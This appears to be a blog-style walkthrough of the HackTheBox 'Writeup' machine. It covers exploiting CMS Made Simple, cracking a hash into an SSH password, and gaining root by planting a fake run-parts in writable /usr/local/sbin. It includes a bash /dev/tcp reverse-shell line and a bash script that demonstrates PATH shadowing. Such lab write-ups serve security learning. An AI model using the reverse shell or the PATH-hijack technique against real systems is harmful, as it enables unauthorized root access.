I’m an avid doer of hackthebox machines, and writeup seems like a great fit to be… written up!
First, let’s start off by doing a basic nmap scan of this machine to see what we can find!
After some enumeration I found a directory called /writeup. It holds three pages and a clever hint about the site not being crafted with vim. The site looks like CMS Made Simple, and it does have a known vulnerability! I wget the exploit script to my Kali box, run it with the target URL http://10.10.10.138/writeup/, and it spits out some lovely output giving me the hashed password and its salt:
It didn't take long to crack this one: drop the hash and salt into a free online cracker and it gives you the password. Now, here's the tricky part: it is not the web password, it's the SSH password for the user! Let's give it a shot.
ssh <user>@10.10.10.138 # password: raykayjay9
Here we have our user.txt file to own the user, bingo!
A basic check of writable directories with find / -type d -writable 2>/dev/null reveals that /usr/local/sbin is writable for us (ignore the usual world-writable spots like /tmp that show up too). This is good news, but what is going to run something from there, and is there a SUID binary involved? At this point I usually crack out some enumerators, but after searching the forum it appears there's a better tool for the job: pspy64! On your Kali box, download pspy64 and scp it to the remote machine.
Now that you've downloaded it and copied it over, make it executable and run it. I noticed my PATH doesn't include /usr/local/sbin, which isn't great... maybe root's does? Nope. The processes pspy shows are executing commands from /bin... yikes.
At this point I opened another terminal (a second SSH login) so I could continue my enumeration, and spotted a goodie in the pspy64 output...
Root is actually executing run-parts on every user login, and the PATH for that command is set right there in the hook, starting with /usr/local/sbin... awesome! Because run-parts is invoked by bare name, the first PATH directory that contains an executable called run-parts wins, and that directory is the one we can write to. Let's create a new run-parts, shall we? 🙂
#!/bin/bash
bash -i >& /dev/tcp/IP_ADDRESS/PORT 0>&1
Make it executable, copy it to /usr/local/sbin/run-parts, start a listener on your Kali box on the port you chose, then ssh in as the user once more. The login hook runs our script as root, and we have a root terminal!
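To check for this kind of PATH shadowing without waiting on pspy, here is an added bash example (mine, not code from the original writeup): given a PATH string and a command name, it reports which directory a bare-name invocation resolves to and which earlier PATH entries the current user can write to, then proves the shadowing in a throwaway directory tree that mimics /usr/local/sbin:/bin. The env -i PATH=... invocation is an assumed stand-in for a root-owned hook that hard-codes its PATH; the function names (resolve_in_path, hijack_dirs, demo_shadow) and the fake command name target are mine.

```bash
#!/bin/bash
# Added example, not part of the original writeup. Run it as the
# low-privilege user: as root every directory tests writable and the
# check says nothing useful.

# resolve_in_path PATH_STRING CMD
#   Prints the first PATH entry holding an executable file named CMD
#   (the one a bare-name invocation would run), or returns 1 if none.
resolve_in_path() {
  local path_str="$1" cmd="$2" dir
  local IFS=':'
  for dir in $path_str; do
    [ -n "$dir" ] || continue               # empty entry means cwd; skip it
    if [ -f "$dir/$cmd" ] && [ -x "$dir/$cmd" ]; then
      printf '%s\n' "$dir"
      return 0
    fi
  done
  return 1
}

# hijack_dirs PATH_STRING CMD
#   Prints every PATH entry searched BEFORE the genuine CMD that the
#   current user can write to. A same-named executable dropped in any of
#   them shadows the real CMD for whoever runs with that PATH.
hijack_dirs() {
  local path_str="$1" cmd="$2" dir
  local IFS=':'
  for dir in $path_str; do
    [ -n "$dir" ] || continue
    if [ -f "$dir/$cmd" ] && [ -x "$dir/$cmd" ]; then
      return 0                              # reached the real binary; stop
    fi
    if [ -d "$dir" ] && [ -w "$dir" ]; then
      printf '%s\n' "$dir"
    fi
  done
  return 1                                  # CMD not found anywhere
}

# demo_shadow
#   Builds a throwaway tree: <root>/bin/target (the "real" binary) and an
#   empty, writable <root>/local/sbin listed first in PATH, mirroring
#   /usr/local/sbin:/bin on the box. Runs `target` through that fixed PATH
#   before and after planting a same-named script, and prints both results.
demo_shadow() {
  local root p resolved candidates before after
  root=$(mktemp -d)
  mkdir -p "$root/local/sbin" "$root/bin"
  printf '#!/bin/sh\necho real\n' > "$root/bin/target"
  chmod 755 "$root/bin/target"
  p="$root/local/sbin:$root/bin"

  resolved=$(resolve_in_path "$p" target)   # where target really lives
  candidates=$(hijack_dirs "$p" target)     # writable dirs searched first

  # env -i PATH=... stands in for a root-owned hook with a hard-coded PATH
  before=$(env -i PATH="$p" target)
  printf '#!/bin/sh\necho hijacked\n' > "$root/local/sbin/target"
  chmod 755 "$root/local/sbin/target"
  after=$(env -i PATH="$p" target)

  rm -rf "$root"
  [ "$resolved" = "$root/bin" ] || return 1
  [ "$candidates" = "$root/local/sbin" ] || return 1
  printf '%s %s\n' "$before" "$after"       # prints: real hijacked
}

demo_shadow
```

On the target, feed hijack_dirs the PATH string you saw in the pspy output for the root-run command, not your own shell's PATH; as the writeup notes, the two differ, and it is the hook's PATH that decides which run-parts executes.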
We’ve now rooted this machine! On to the next, shall we? 🙂